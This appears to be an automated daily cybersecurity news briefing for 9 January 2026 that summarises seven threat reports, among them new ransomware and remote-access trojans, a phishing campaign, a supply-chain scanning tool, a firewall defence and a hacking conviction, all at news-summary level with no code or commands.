Good morning. This is your security briefing for Friday, January 09, 2026, covering seven critical developments in the threat landscape. All attribution is by the article authors, and all article analysis is automated.
Trellix has uncovered CrazyHunter, a sophisticated Go-based ransomware that emerged in mid-2024 targeting healthcare companies in Taiwan. The malware employs double extortion tactics, uses vulnerable Zemana drivers for privilege escalation, and leverages Group Policy Objects for lateral movement while encrypting files with ChaCha20 encryption.
Joe Security has analyzed a sophisticated phishing campaign impersonating DocuSign to deliver malware through a fake document platform. Victims download a malicious executable signed with a valid code-signing certificate that employs multiple evasion layers to avoid detection.
MHaggis has released PackageInferno, a Docker-based open source tool for scanning the npm software supply chain for malicious patterns and vulnerabilities. The tool uses YARA rules to detect obfuscated code, credential theft, unauthorized network calls, and typosquatting, with results visualized through a Streamlit dashboard.
Amazon Web Services has demonstrated how AWS Network Firewall's active threat defense system leverages their MadPot honeypot network to block cyber threats in real-time. The system successfully detected and blocked an attack campaign exploiting CVE-2025-48703 in Control Web Panel, deploying protective rules within 30 minutes of threat identification.
De Rechtspraak reports that a defendant has been sentenced to seven years in prison for computer hacking involving unauthorized access to port systems. The perpetrator used a malware-infected USB drive to install a backdoor with the goal of facilitating undetected drug importation through manipulation of gate controls and RFID systems.
CloudSEK has identified RustyWater, a new Rust-based Remote Access Trojan deployed by the Muddy Water APT group in spear-phishing campaigns. The implant targets diplomatic, maritime, financial, and telecommunications sectors across the Middle East, featuring asynchronous command and control, anti-analysis mechanisms, and modular post-compromise capabilities designed for long-term surveillance operations.
Huntress has intercepted a sophisticated attack on VMware ESXi environments that began with compromised SonicWall VPN credentials in December 2025. The threat actors deployed an ESXi exploit toolkit, potentially developed as a zero-day over a year before VMware's awareness, with the intent to deploy ransomware before Huntress successfully stopped the attack.